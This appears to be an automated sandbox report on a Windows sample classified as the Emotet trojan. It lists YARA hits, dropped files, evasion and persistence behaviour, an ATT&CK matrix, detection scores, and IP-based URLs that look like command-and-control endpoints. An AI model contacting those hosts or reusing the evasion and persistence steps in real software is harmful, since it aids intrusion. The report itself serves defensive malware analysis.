                  Source: Yara matchFile source: 00000000.00000002.203533038.0000000002DB0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.465253689.0000000001151000.00000020.00000001.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\mormanti.exeFile created: C:\Windows\SysWOW64\msmpeg2vdec\Jump to behavior
                  Source: C:\Users\user\Desktop\mormanti.exeFile deleted: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exe:Zone.IdentifierJump to behavior
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_02DB23AF0_2_02DB23AF
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_02DB253B0_2_02DB253B
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_02DC2BFC0_2_02DC2BFC
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_02DC2A700_2_02DC2A70
                  Source: mormanti.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: mormanti.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: mormanti.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: mormanti.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: mormanti.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: mormanti.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: mormanti.exe, 00000000.00000002.203709994.0000000003060000.00000002.00000001.sdmpBinary or memory string: originalfilename vs mormanti.exe
                  Source: mormanti.exe, 00000000.00000002.203709994.0000000003060000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs mormanti.exe
                  Source: mormanti.exe, 00000000.00000002.203665960.0000000003000000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs mormanti.exe
                  Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                  Source: mormanti.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@17/8@0/81
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5024:120:WilError_01
                  Source: C:\Users\user\Desktop\mormanti.exeCommand line argument: schtasks.exe0_2_00C121FD
                  Source: C:\Users\user\Desktop\mormanti.exeCommand line argument: 40960_2_00C121FD
                  Source: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeCommand line argument: schtasks.exe2_2_00C121FD
                  Source: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeCommand line argument: 40962_2_00C121FD
                  Source: mormanti.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\mormanti.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\mormanti.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: mormanti.exeVirustotal: Detection: 74%
                  Source: mormanti.exeReversingLabs: Detection: 82%
                  Source: unknownProcess created: C:\Users\user\Desktop\mormanti.exe 'C:\Users\user\Desktop\mormanti.exe'
                  Source: C:\Users\user\Desktop\mormanti.exeProcess created: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exe C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                  Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\mormanti.exeProcess created: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exe C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
                  Source: C:\Users\user\Desktop\mormanti.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\mormanti.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_508df7e2bcbccb90\MSVCR90.dllJump to behavior
                  Source: mormanti.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: mormanti.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: mormanti.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: mormanti.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: mormanti.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: mormanti.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: mormanti.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: mormanti.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Users\DODO\Pictures\win32_memdc_src\Release\Win32_MemDC.pdb` source: mormanti.exe, 00000000.00000002.203184717.0000000000C14000.00000002.00020000.sdmp, eventvwr.exe, 00000002.00000002.465026006.0000000000C14000.00000002.00020000.sdmp
                  Source: Binary string: C:\Users\DODO\Pictures\win32_memdc_src\Release\Win32_MemDC.pdb`@ source: mormanti.exe
                  Source: Binary string: C:\Users\DODO\Pictures\win32_memdc_src\Release\Win32_MemDC.pdb source: mormanti.exe
                  Source: mormanti.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: mormanti.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: mormanti.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: mormanti.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: mormanti.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_00C12D89 push ecx; ret 0_2_00C12D9C
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_00C13121 push ecx; ret 0_2_00C13134
                  Source: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeCode function: 2_2_00C12D89 push ecx; ret 2_2_00C12D9C
                  Source: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeCode function: 2_2_00C13121 push ecx; ret 2_2_00C13134

                  Persistence and Installation Behavior:

                  barindex
                  Drops executables to the windows directory (C:\Windows) and starts themShow sources
                  Source: C:\Users\user\Desktop\mormanti.exeExecutable created and started: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeJump to behavior
                  Source: C:\Users\user\Desktop\mormanti.exePE file moved: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeJump to behavior

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                  Source: C:\Users\user\Desktop\mormanti.exeFile opened: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exe:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Users\user\Desktop\mormanti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion:

                  barindex
                  Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                  Source: C:\Users\user\Desktop\mormanti.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-6572
                  Source: C:\Windows\System32\svchost.exe TID: 3980Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\mormanti.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_02DC2871 FindFirstFileW,FindNextFileW,FindClose,0_2_02DC2871
                  Source: svchost.exe, 00000005.00000002.227092288.0000025121F40000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.276841534.000001F85F660000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.291456589.000001F7F1260000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.466345591.000001C4ADF40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: svchost.exe, 00000006.00000002.466653401.0000022B0E460000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                  Source: eventvwr.exe, 00000002.00000003.394916417.00000000034DC000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.466637022.0000022B0E453000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                  Source: svchost.exe, 0000000A.00000002.465149550.000001E006C02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                  Source: svchost.exe, 00000005.00000002.227092288.0000025121F40000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.276841534.000001F85F660000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.291456589.000001F7F1260000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.466345591.000001C4ADF40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: svchost.exe, 00000005.00000002.227092288.0000025121F40000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.276841534.000001F85F660000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.291456589.000001F7F1260000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.466345591.000001C4ADF40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: svchost.exe, 00000006.00000002.465518449.0000022B08E29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@aF
                  Source: svchost.exe, 0000000A.00000002.465212488.000001E006C29000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.465407534.000001C4AD251000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.465492639.0000016AC822A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: svchost.exe, 00000005.00000002.227092288.0000025121F40000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.276841534.000001F85F660000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.291456589.000001F7F1260000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.466345591.000001C4ADF40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_00C1272C IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00C1272C
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_00C11FF2 mov eax, dword ptr fs:[00000030h]0_2_00C11FF2
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_02DB304D mov eax, dword ptr fs:[00000030h]0_2_02DB304D
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_02DB0467 mov eax, dword ptr fs:[00000030h]0_2_02DB0467
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_02DB277C mov eax, dword ptr fs:[00000030h]0_2_02DB277C
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_02DC370E mov eax, dword ptr fs:[00000030h]0_2_02DC370E
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_02DC2E3D mov eax, dword ptr fs:[00000030h]0_2_02DC2E3D
                  Source: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeCode function: 2_2_00C11FF2 mov eax, dword ptr fs:[00000030h]2_2_00C11FF2
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_00C1272C IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00C1272C
                  Source: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeCode function: 2_2_00C1272C IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,2_2_00C1272C
                  Source: eventvwr.exe, 00000002.00000002.465850573.00000000019E0000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.465566691.00000284E1A60000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: eventvwr.exe, 00000002.00000002.465850573.00000000019E0000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.465566691.00000284E1A60000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: eventvwr.exe, 00000002.00000002.465850573.00000000019E0000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.465566691.00000284E1A60000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: eventvwr.exe, 00000002.00000002.465850573.00000000019E0000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.465566691.00000284E1A60000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\mormanti.exeCode function: 0_2_00C12FF8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00C12FF8
                  Source: C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings:

                  barindex
                  Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                  Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                  Source: svchost.exe, 00000010.00000002.465576432.0000013FA9502000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: svchost.exe, 00000010.00000002.465525101.0000013FA943D000.00000004.00000001.sdmpBinary or memory string: @\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected EmotetShow sources
                  Source: Yara matchFile source: 0.2.mormanti.exe.2db053f.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.eventvwr.exe.114053f.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.mormanti.exe.2db053f.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.eventvwr.exe.114053f.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.465228013.0000000001140000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.203533038.0000000002DB0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.465253689.0000000001151000.00000020.00000001.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation1DLL Side-Loading1Process Injection2Masquerading121OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySecurity Software Discovery41Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncSystem Information Discovery24Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  mormanti.exe75%VirustotalBrowse
                  mormanti.exe82%ReversingLabsWin32.Trojan.Emotet
                  mormanti.exe100%AviraTR/Kryptik.vhuzo

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  2.2.eventvwr.exe.c10000.0.unpack100%AviraHEUR/AGEN.1138886Download File
                  0.0.mormanti.exe.c10000.0.unpack100%AviraHEUR/AGEN.1138886Download File
                  0.2.mormanti.exe.c10000.0.unpack100%AviraHEUR/AGEN.1138886Download File
                  2.0.eventvwr.exe.c10000.0.unpack100%AviraHEUR/AGEN.1138886Download File
                  0.2.mormanti.exe.2db053f.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  2.2.eventvwr.exe.114053f.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://68.183.170.114/nFzrf7w0/EO2pZ/MQ0xve/0%Avira URL Cloudsafe
                  https://fs.microsoft.c0%Avira URL Cloudsafe
                  http://68.183.170.114:8080/nFzrf7w0/EO2pZ/MQ0xve/0%Avira URL Cloudsafe
                  http://72.47.248.48:7080/VTzYrEpbArBozqZBhS/0%Avira URL Cloudsafe
                  http://66.228.49.173:8080/TyLIHl4nuj0XCeB/C12IKmccuoQw2U92z/s(KF0%Avira URL Cloudsafe
                  http://66.228.49.173/TyLIHl4nuj0XCeB/C12IKmccuoQw2U92z/0%Avira URL Cloudsafe
                  http://149.62.173.247:8080/kH8ALNiaGV/5bEuMKuJNKlslD3n/rvXy2RpDwZlslOQBeY7/BCLTdgbwF6J8vsIGfDq/jZ9iV0%Avira URL Cloudsafe
                  http://68.183.170.114:8080/nFzrf7w0/EO2pZ/MQ0xve/c0%Avira URL Cloudsafe
                  http://66.228.49.173:8080/TyLIHl4nuj0XCeB/C12IKmccuoQw2U92z/0%Avira URL Cloudsafe
                  http://72.47.248.48:7080/VTzYrEpbArBozqZBhS/CL:0%Avira URL Cloudsafe
                  http://149.62.173.247/kH8ALNiaGV/5bEuMKuJNKlslD3n/rvXy2RpDwZlslOQBeY7/BCLTdgbwF6J8vsIGfDq/jZ9iV8xFle0%Avira URL Cloudsafe
                  https://%s.xboxlive.com0%URL Reputationsafe
                  https://%s.xboxlive.com0%URL Reputationsafe
                  https://%s.xboxlive.com0%URL Reputationsafe
                  https://dynamic.t0%URL Reputationsafe
                  https://dynamic.t0%URL Reputationsafe
                  https://dynamic.t0%URL Reputationsafe
                  http://72.47.248.48:7080/VTzYrEpbArBozqZBhS/6O0%Avira URL Cloudsafe
                  http://68.183.170.114:8080/nFzrf7w0/EO2pZ/MQ0xve/:0%Avira URL Cloudsafe
                  http://58.171.153.81/j4XmHhlvX7h4pe/uu11HumRcyQn/3XzJ/ymPM07W/vKmfGodTznrrD/0%Avira URL Cloudsafe
                  https://%s.dnet.xboxlive.com0%URL Reputationsafe
                  https://%s.dnet.xboxlive.com0%URL Reputationsafe
                  https://%s.dnet.xboxlive.com0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://68.183.170.114/nFzrf7w0/EO2pZ/MQ0xve/eventvwr.exe, 00000002.00000002.467254710.00000000034DB000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://fs.microsoft.ceventvwr.exe, 00000002.00000003.334420749.00000000034E1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000E.00000002.309140351.00000265B8A3E000.00000004.00000001.sdmpfalse
                    high
                    https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000E.00000003.308632739.00000265B8A61000.00000004.00000001.sdmpfalse
                      high
                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000E.00000002.309140351.00000265B8A3E000.00000004.00000001.sdmpfalse
                        high
                        https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000E.00000003.308646998.00000265B8A5C000.00000004.00000001.sdmpfalse
                          high
                          https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000E.00000003.308695347.00000265B8A45000.00000004.00000001.sdmpfalse
                            high
                            http://68.183.170.114:8080/nFzrf7w0/EO2pZ/MQ0xve/eventvwr.exe, 00000002.00000002.466095172.0000000002ED6000.00000004.00000001.sdmp, eventvwr.exe, 00000002.00000002.467254710.00000000034DB000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/svchost.exe, 00000006.00000002.465692005.0000022B08EA3000.00000004.00000001.sdmpfalse
                              high
                              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000E.00000003.308632739.00000265B8A61000.00000004.00000001.sdmpfalse
                                high
                                https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000E.00000002.309153516.00000265B8A42000.00000004.00000001.sdmpfalse
                                  high
                                  http://72.47.248.48:7080/VTzYrEpbArBozqZBhS/eventvwr.exe, 00000002.00000002.467254710.00000000034DB000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://66.228.49.173:8080/TyLIHl4nuj0XCeB/C12IKmccuoQw2U92z/s(KFeventvwr.exe, 00000002.00000003.334420749.00000000034E1000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://66.228.49.173/TyLIHl4nuj0XCeB/C12IKmccuoQw2U92z/eventvwr.exe, 00000002.00000003.334420749.00000000034E1000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
